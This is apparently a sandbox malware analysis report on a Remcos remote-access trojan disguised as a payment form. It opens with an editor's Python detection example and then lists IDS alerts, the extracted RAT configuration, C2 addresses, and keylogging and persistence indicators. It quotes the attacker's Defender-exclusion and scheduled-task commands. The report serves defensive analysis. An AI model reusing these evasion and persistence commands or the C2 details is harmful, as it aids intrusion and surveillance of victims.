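The Sigma matches in the System Summary, Persistence and Stealing sections above all key on command-line and registry artifacts that are visible in the process tree: Add-MpPreference with an -ExclusionPath, schtasks /Create with its task XML in a temp folder, wscript.exe fed a script from a temp folder, Run values under HKCU and HKLM\SOFTWARE\WOW6432Node, and the Rmc-VCJ8ZS\exepath value. The Python below is an editor's example, not Joe Sandbox or Sigma project code: it implements those checks over constructed Sysmon-style events whose command lines and registry paths are copied from this report, plus one constructed benign schtasks event showing that the temp-folder condition is what separates the malicious task creation from a normal installer's. Event field names (image, command_line, target_object, details) are this example's own and do not reproduce Sysmon's exact schema; rule names in the comments are the report's own Sigma titles.

```python
"""Sigma-style checks for the behaviours in this report, run over constructed
Sysmon-like events. Editor's example; not Joe Sandbox or Sigma project code."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal Sysmon-like record: event_id 1 = process create, 13 = registry value set.
    Field names are this example's own, not Sysmon's exact schema."""
    event_id: int
    image: str
    command_line: str = ""
    parent_image: str = ""
    target_object: str = ""
    details: str = ""


TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
REMCOS_SETTINGS_KEY = re.compile(r"\\SOFTWARE\\Rmc-[A-Z0-9]+\\exepath$", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

SAMPLE = r"C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"

# Constructed events; command lines and registry paths are copied from this report.
# The last event is a constructed benign control.
EVENTS = [
    Event(1, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"',
          SAMPLE),
    Event(1, r"C:\Windows\SysWOW64\schtasks.exe",
          r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"',
          SAMPLE),
    Event(1, r"C:\Windows\SysWOW64\wscript.exe",
          r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"',
          SAMPLE),
    Event(13, SAMPLE, target_object=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppUpdate",
          details=r"C:\ProgramData\AppUpdate\remcos.exe"),
    Event(13, SAMPLE, target_object=r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AppUpdate",
          details=r"C:\ProgramData\AppUpdate\remcos.exe"),
    Event(13, r"C:\ProgramData\AppUpdate\remcos.exe", target_object=r"HKEY_CURRENT_USER\SOFTWARE\Rmc-VCJ8ZS\exepath",
          details="(encrypted install-path blob, omitted here)"),
    # Benign control (constructed): an installer registering a task from an XML outside any temp folder.
    Event(1, r"C:\Windows\System32\schtasks.exe",
          r'"C:\Windows\System32\schtasks.exe" /Create /TN "Vendor\Updater" /XML "C:\ProgramData\Vendor\task.xml"',
          r"C:\Program Files\Vendor\setup.exe"),
]
BENIGN = EVENTS[-1]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _xml_arg(cmdline: str):
    """Return the path given to schtasks /XML (quoted or bare), or None."""
    m = re.search(r'/XML\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def detect(ev: Event) -> list:
    """Apply every rule to one event and return the names of those that fire."""
    hits = []
    img = _basename(ev.image)
    cl = ev.command_line
    if ev.event_id == 1:
        # "Powershell Defender Exclusion": Add-MpPreference with any -Exclusion* switch.
        if img in ("powershell.exe", "pwsh.exe") and re.search(r"\bAdd-MpPreference\b", cl, re.I) \
                and re.search(r"-Exclusion(Path|Process|Extension|IpAddress)\b", cl, re.I):
            hits.append("defender_exclusion_via_powershell")
        # "Scheduled temp file as task from temp location": /Create with the task XML under a temp folder.
        if img == "schtasks.exe" and re.search(r"/Create\b", cl, re.I):
            xml = _xml_arg(cl)
            if xml and TEMP_DIR.search(xml):
                hits.append("schtasks_xml_from_temp")
        # "Suspicious Script Execution From Temp Folder": a script host given a temp-folder path.
        if img in SCRIPT_HOSTS and TEMP_DIR.search(cl):
            hits.append("script_host_from_temp")
    elif ev.event_id == 13:
        # "CurrentVersion Autorun Keys Modification", with the Wow6432Node variant flagged separately.
        if RUN_KEY.search(ev.target_object):
            hits.append("run_key_persistence")
            if "\\wow6432node\\" in ev.target_object.lower():
                hits.append("run_key_wow6432node")
        # Remcos stores its encrypted install path under HKCU\SOFTWARE\<mutex>\exepath.
        if REMCOS_SETTINGS_KEY.search(ev.target_object):
            hits.append("remcos_exepath_key")
    return hits


def triage(events) -> Counter:
    """Count rule hits across a batch of events."""
    counts = Counter()
    for ev in events:
        counts.update(detect(ev))
    return counts


if __name__ == "__main__":
    for rule, n in sorted(triage(EVENTS).items()):
        print(f"{rule:36s} {n}")
```

The schtasks rule deliberately inspects the /XML argument rather than the whole command line, so a task whose name happens to contain "Temp" is not flagged while one whose definition is read from %LOCALAPPDATA%\Temp is.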
Suricata IDS alerts
Timestamp                        SID      Severity  Classtype                                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-11-24T08:23:49.109682+0100  2036594  1         Malware Command and Control Activity Detected  192.168.2.9  49754        212.162.149.226  9285              TCP
2024-11-24T08:23:52.905180+0100  2803304  3         Unknown Traffic                                192.168.2.9  49761        178.237.33.50    80                TCP


              AV Detection

Source: C:\Users\user\AppData\Local\Temp\install.vbs; Avira: detection malicious, Label: VBS/Runner.VPD
Source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["149.226:9285:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "AppUpdate", "Hide file": "Disable", "Mutex": "Rmc-VCJ8ZS", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppUpdate", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: C:\ProgramData\AppUpdate\remcos.exe; ReversingLabs: Detection: 52%
Source: C:\ProgramData\AppUpdate\remcos.exe; Virustotal: Detection: 61%
Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe; ReversingLabs: Detection: 52%
Source: Payment Transfer Request Form.bat.exe; ReversingLabs: Detection: 52%
Source: Payment Transfer Request Form.bat.exe; Virustotal: Detection: 61%
Source: Yara match; File source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\AppUpdate\remcos.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exe; Joe Sandbox ML: detected
Source: Payment Transfer Request Form.bat.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: Payment Transfer Request Form.bat.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment Transfer Request Form.bat.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_004068CD FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_0044BA59 FindFirstFileExA
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe; Code function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

              Software Vulnerabilities

              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 4x nop then jmp 06A9AE4Eh0_2_06A9B437
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 0776A3DEh15_2_0776A9C7
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 074CA0E6h24_2_074CA6CF
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 0721A0E6h29_2_0721A6CF
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 074EA0E6h33_2_074EA6CF

              Networking

              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49754 -> 212.162.149.226:9285
              Source: Malware configuration extractorURLs: 149.226
              Source: global trafficTCP traffic: 192.168.2.9:49754 -> 212.162.149.226:9285
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49761 -> 178.237.33.50:80
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041936B
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/PU
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/_IDENTIFIER=Intel64
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/iv
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Payment Transfer Request Form.bat.exe, 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: remcos.exe, 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1414846976.000000000282C000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000000F.00000002.1535563914.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000018.00000002.1598556738.000000000319F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000001D.00000002.1679679015.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000021.00000002.1760390363.00000000030DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00409340 SetWindowsHookExA 0000000D,0040932C,000000009_2_00409340
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040A65A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_00414EC1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,9_2_00409468

              E-Banking Fraud

              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A76C SystemParametersInfoW,9_2_0041A76C

              System Summary

              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: initial sampleStatic PE information: Filename: Payment Transfer Request Form.bat.exe
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_00414DB4
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_026046070_2_02604607
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_0260D51C0_2_0260D51C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A9CB080_2_06A9CB08
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A956F00_2_06A956F0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A952B80_2_06A952B8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A972680_2_06A97268
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A94E800_2_06A94E80
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A95B280_2_06A95B28
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A95B270_2_06A95B27
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004251529_2_00425152
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004352869_2_00435286
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004513D49_2_004513D4
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0045050B9_2_0045050B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004365109_2_00436510
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004316FB9_2_004316FB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043569E9_2_0043569E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004437009_2_00443700
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004257FB9_2_004257FB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004128E39_2_004128E3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004259649_2_00425964
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041B9179_2_0041B917
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043D9CC9_2_0043D9CC
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00435AD39_2_00435AD3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00424BC39_2_00424BC3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043DBFB9_2_0043DBFB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0044ABA99_2_0044ABA9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00433C0B9_2_00433C0B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00434D8A9_2_00434D8A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043DE2A9_2_0043DE2A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041CEAF9_2_0041CEAF
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00435F089_2_00435F08
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_016BD51C11_2_016BD51C
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_0753940811_2_07539408
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_0753726811_2_07537268
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_07534E8011_2_07534E80
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_07535B1911_2_07535B19
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_07535B2811_2_07535B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0141D51C15_2_0141D51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0776C08115_2_0776C081
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_077656F015_2_077656F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0776726815_2_07767268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_077652B815_2_077652B8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_07764E8015_2_07764E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_07765B2815_2_07765B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_07765B1815_2_07765B18
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_015AD51C24_2_015AD51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074CBD9924_2_074CBD99
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C56F024_2_074C56F0
